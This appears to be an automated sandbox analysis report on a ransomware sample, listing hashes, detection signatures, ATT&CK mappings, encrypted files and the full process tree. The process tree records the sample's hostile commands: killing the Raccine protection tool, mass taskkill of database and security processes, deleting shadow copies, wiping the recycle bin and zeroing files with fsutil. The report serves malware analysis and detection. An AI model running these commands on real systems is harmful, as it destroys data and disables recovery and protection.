Resubmissions

12-06-2024 08:28

240612-kcy2jawckj 10

10-06-2024 17:27

240610-v1ktxsvbpk 10

Analysis

  • max time kernel
    15s
  • max time network
    24s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10-06-2024 17:27

General

  • Target

    Mydoom/Mydoom Ransomwares/1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

  • Size

    127KB

  • MD5

    93a7ed73f2245a1f043b74e724705f54

  • SHA1

    6b97b4cd5d44e607540b841081f68b7755ce59f5

  • SHA256

    1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406

  • SHA512

    ab1d5999d7bdeb0a2d93a7476cbcace92971417d45a7459fbe294ed66d0466f0e121a68fe9ade89c3c71d4afab3b81b94aaaeabc99e6f02f79c307acbf574090

  • SSDEEP

    3072:bhADm5OPINYUsx0Ki6uA9bKHtBdQex7Coy5q5l:bhAcO7xhjuA9bQQzq

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Renames multiple (228) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Drops file in Program Files directory 60 IoCs
  • Drops file in Windows directory 24 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
    "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4560
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:704
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3480
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3700
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:1284
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:2260
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config SSDPSRV start= auto
          2⤵
          • Launches sc.exe
          PID:1236
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2172
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:956
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
            • Launches sc.exe
            PID:3940
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:904
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
            • Launches sc.exe
            PID:2508
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SstpSvc start= disabled
            2⤵
            • Launches sc.exe
            PID:4904
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5000
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM firefoxconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3168
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM excel.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM agntsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5068
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2040
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM CNTAoSMgr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2916
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2336
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1392
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlwriter.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:868
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM steam.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1304
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:544
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tbirdconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4856
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat64.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4372
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM encsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3412
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqbcoreservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4712
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocomm.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4740
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbeng50.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1940
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mbamtray.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" IM thunderbird.exe /F
            2⤵
            • Kills process with taskkill
            PID:4896
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM infopath.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM zoolz.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3344
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM isqlplussvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4768
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbsnmp.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4956
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tmlisten.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4852
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM onenote.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1500
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM xfssvccon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:444
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM visio.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3612
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msftesql.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4464
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2908
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM PccNTMon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2692
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM winword.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2700
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM powerpnt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1224
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msaccess.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3556
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM Ntrtscan.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2096
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-nt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1200
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2164
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM outlook.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2740
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocautoupds.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1480
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              3⤵
                PID:2336
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlservr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM wordpad.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4008
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM ocssd.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3244
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mysqld-opt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2120
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM synctime.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3800
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM oracle.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4628
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlagent.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3148
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlbrowser.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:436
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1336
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
              2⤵
                PID:4756
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:1188
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:4192
                  • C:\Windows\SysWOW64\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:688
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
                    2⤵
                      PID:1984
                      • C:\Windows\SysWOW64\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:2740

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Execution

                    System Services

                    1
                    T1569

                    Service Execution

                    1
                    T1569.002

                    Persistence

                    Create or Modify System Process

                    1
                    T1543

                    Windows Service

                    1
                    T1543.003

                    Privilege Escalation

                    Create or Modify System Process

                    1
                    T1543

                    Windows Service

                    1
                    T1543.003

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Discovery

                    System Information Discovery

                    1
                    T1082

                    Remote System Discovery

                    1
                    T1018

                    Impact

                    Service Stop

                    1
                    T1489

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbres00002.jrs.secure[[email protected]]
                      Filesize

                      1024KB

                      MD5

                      9029fcc695c76bb1afb6c5a4bb32a8fb

                      SHA1

                      7313a07e22ed6d07e29668d3f77d8331f6f1b798

                      SHA256

                      6f5b064710656c170fbff82e7a6200a29fe09911fae8d563a56780bfe29511cf

                      SHA512

                      cc15e7362a08998726aab0de494b9ef58e182325fd8ba65fc6735967870661aab8c38dc7f6b95bc15df2b9eed2afb3619599d82eb16d8505997b77917ed3ce12

                    • C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi.secure[[email protected]]
                      Filesize

                      28.8MB

                      MD5

                      d7c3b5ede7cc08eb8840fdb9b1ddeebf

                      SHA1

                      c3773f4b213fc9f3094900649718b9588defa037

                      SHA256

                      bd27fa9513d8c0bbcfc1f90288ff3799f4a0673c2c6c365637023ff8b0bf001d

                      SHA512

                      675f17a400c018c15a36a992e8bb426fc9e68fc88a60bc16ff61d3ad5b326d8499e4a47080f24b7b3ee44aab3e865f54af30b1f66356f1d813e358d5cf7d5074

                    • C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.secure[[email protected]]
                      Filesize

                      728KB

                      MD5

                      facdc669b77d4d79d9452dbcb9cb74b0

                      SHA1

                      f4627df3e19853f491708334588056ddc70bae27

                      SHA256

                      196396910ea9194e6d23df07e497da7631817404ab64700b5142eb2f4d8beff4

                      SHA512

                      9c3a1c263c23ab0bc9f02a285d329566e4582cf5624ea0d5f06115d467bd79f6d397318fb4199fb030e95e1456e3e3364b0053ce174a1b12db89a18d71cd3d39

                    • C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi.secure[[email protected]]
                      Filesize

                      25.7MB

                      MD5

                      8df2b76066131eb0d154861207774428

                      SHA1

                      89c49ddbf8acc3e268b1d8896af68661875745c1

                      SHA256

                      e67fc8c246b3186f84c7d451caa0450b9794e34f806b59b6f0b239762b44b873

                      SHA512

                      bd10a5c56c67c58e13f117596c512cbd85f41b33cbdb36bd15d4f3e0c3458f018adba3b6b94ee1e5948a53194d98db0f2a34ff5302deac2df741ebd30e493a0e

                    • C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.secure[[email protected]]
                      Filesize

                      180KB

                      MD5

                      a743bed37c5d6ea787a12d861718e6ed

                      SHA1

                      ececb001962d690b86bf174f19ad828a4745fe0a

                      SHA256

                      cb9bebc8312a1eec0b5eaaa29d17e61a8739604a0227822c24f5010e6f8ff73b

                      SHA512

                      b76a48ac65a848cf144c1469cf433ba4d19e370cb93c766d85f947b194a48523782e5a3b331d4775dfb3796b4571d0311c0ac5553c62f3d588d08e1d9934511a

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgiccj3l.rcl.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                      Filesize

                      1KB

                      MD5

                      10f4bace88d55713be6ede3929d0cee5

                      SHA1

                      2d2a5aa0293d8fae935acd72ff56bb0d09f4100d

                      SHA256

                      dac413e698454ddbbf167f839949f61aaec0f63d48cfa169bf66de767a1a105b

                      SHA512

                      ca8e061b8249b5bfb3a1abb1f19858d4c09bd0386d8227341894f0eb0cb52145f539ac5b446523f63f40d4f35766c993950a400248f7bdf7f244c46269051f97

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                      Filesize

                      914B

                      MD5

                      dc2eeb9f35a4db55256e287e1fbc7f75

                      SHA1

                      df6b862e9590b8bf00f5286691e552e6ebbe4c0e

                      SHA256

                      36842cdd712e8168bef30bcf769b3ca7d6b61863f5b055e0f93a927bd2c6ca06

                      SHA512

                      1b45b75b0b31bb807fd92080bd404a74b678a9327b5cc1f0ec2c88a4b947bfffb370cfadf876b364b6b99391b43985a7b267718dee56b08deeb409fac9c376a0

                    • memory/1336-80-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
                      Filesize

                      216KB

                    • memory/1336-81-0x00000000056D0000-0x0000000005CFA000-memory.dmp
                      Filesize

                      6.2MB

                    • memory/1336-86-0x00000000055F0000-0x0000000005612000-memory.dmp
                      Filesize

                      136KB

                    • memory/1336-87-0x0000000005DF0000-0x0000000005E56000-memory.dmp
                      Filesize

                      408KB

                    • memory/1336-96-0x0000000006040000-0x0000000006397000-memory.dmp
                      Filesize

                      3.3MB

                    • memory/1336-102-0x0000000006470000-0x000000000648E000-memory.dmp
                      Filesize

                      120KB

                    • memory/1336-103-0x00000000064B0000-0x00000000064FC000-memory.dmp
                      Filesize

                      304KB

                    • memory/3664-3-0x0000000074270000-0x0000000074A21000-memory.dmp
                      Filesize

                      7.7MB

                    • memory/3664-1-0x0000000000DD0000-0x0000000000DF6000-memory.dmp
                      Filesize

                      152KB

                    • memory/3664-2-0x00000000056F0000-0x0000000005756000-memory.dmp
                      Filesize

                      408KB

                    • memory/3664-0-0x000000007427E000-0x000000007427F000-memory.dmp
                      Filesize

                      4KB

                    • memory/3664-632-0x0000000074270000-0x0000000074A21000-memory.dmp
                      Filesize

                      7.7MB